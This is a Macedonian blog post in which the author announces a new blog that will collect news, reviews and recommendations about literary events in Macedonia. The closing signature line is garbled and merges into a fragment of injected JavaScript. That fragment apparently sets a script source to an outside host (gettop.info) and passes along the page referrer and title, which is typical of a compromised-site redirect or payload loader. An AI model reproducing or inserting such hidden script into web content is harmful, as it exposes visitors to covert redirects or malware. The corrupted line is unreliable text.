Обраќање

Posted by naliv     Category: Архивалии

Почитувани љубители на книжевноста,

Ви се обраќам за да ве известам што се случува на полето на книжевноста во Македонија. Имено, постои саем на книга, по некоја катедра на Факултет, промоции, поетски читања, фестивали, конференции, седенки по кафани, критики, препукувања на блогови и сето она останато што досега не го споменав. Природно се наметнуваат дополнителните прашања: Кој? Што? Каде? Кога? (а можеби и зошто, ама тоа е за оние што сакаат да знаат повеќе). А за оние што ептен сакаат да знаат повеќе, во овој момент ќе се зачудат и каде да ги најдат тие информации.

Моментално, функционираат неколку извори: дневните весници, интернет страниците, блоговите. Значи, треба секојдневно да ги разгледувате девните весници, сите (зашто некои информации некаде ги има, а некаде не). Ако ви се посреќи да запознаете некој блогер, и да му го запомните псевдонимот, можеби и оттаму нешто ќе откриете. Интернет страниците на факулетите, на фестивалите и собирнаките или оние чија потесна специјалност е сештологијата, ако се погоди да се навремено ажурирани, во оној дел наметет за книжевноста (најчесто во склоп на други категории) евентуално би содржеле некаква корисна информација. А и заборавив да ве прашам! Кога одите на Саемот на книгата, дали знаете што барате да купите? Или можеби барате „нешто интересно“ до „нешто убаво“? Сево ова одзема време, покренува потреба од „Златна книга“ во вашите глави за дневни весници, псевдоними за блогери, имиња на веб страници итн итн и многу среќа (да не задоцните, да налетете на ажуриран сајт) и секојдевно да го правите сето тоа одново.

Целта на овој блог е да ги собере тие информации навремено и на едно место. Тука, единствен предмет на интерес е книжевноста. Значи, ќе бидете поштедени од пребарување на соодветната категорија или клучен збор, купот весници и веб страници што можат да содржат „нешто поврзано со тоа“ што заштедува значително количество време. Притоа, го водат луѓе кои професионално ја проучуваат книжевноста (а потребата од вакви информации не им е хоби). Токму затоа овој блог е антена што емитува од самото средиште на настаните, пренесува информации од прва рака. И на крај, чисто за да ја ставиме јаготката на тортата, прашајте нè, знаеме да ви одговориме! (а ако одговорот не ви се допаѓа, повелете критикуваје) Веќе одамна сите можат да ви одговорат, најразлични продавачи, волонтери, пополнувачи на празни места со х познавања, но само некои знаат што зборуваат и зошто. И уште малце до крај, тука ќе најдете и дискусија за одржаните настани од посетители со најразлични профили, препораки на наслови со објаснување зошто токму тоа се препорачува, осврти и критики поткрепени со користени дела, предлози за понатамошно читање (листата е недовршена).

Да сумираме, информации за книжевноста има на неколку извори само ако ги запомните и имате многу среќа и секојдневно ги проверувате. Еден блог се занимава едниствено со книжевност, го водат професоналцни кои знаат што и зошто пишуваат и тоа можат да го објаснат на сите.

Срдечно,

naliv.kauza.mks.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; }

Leave a Reply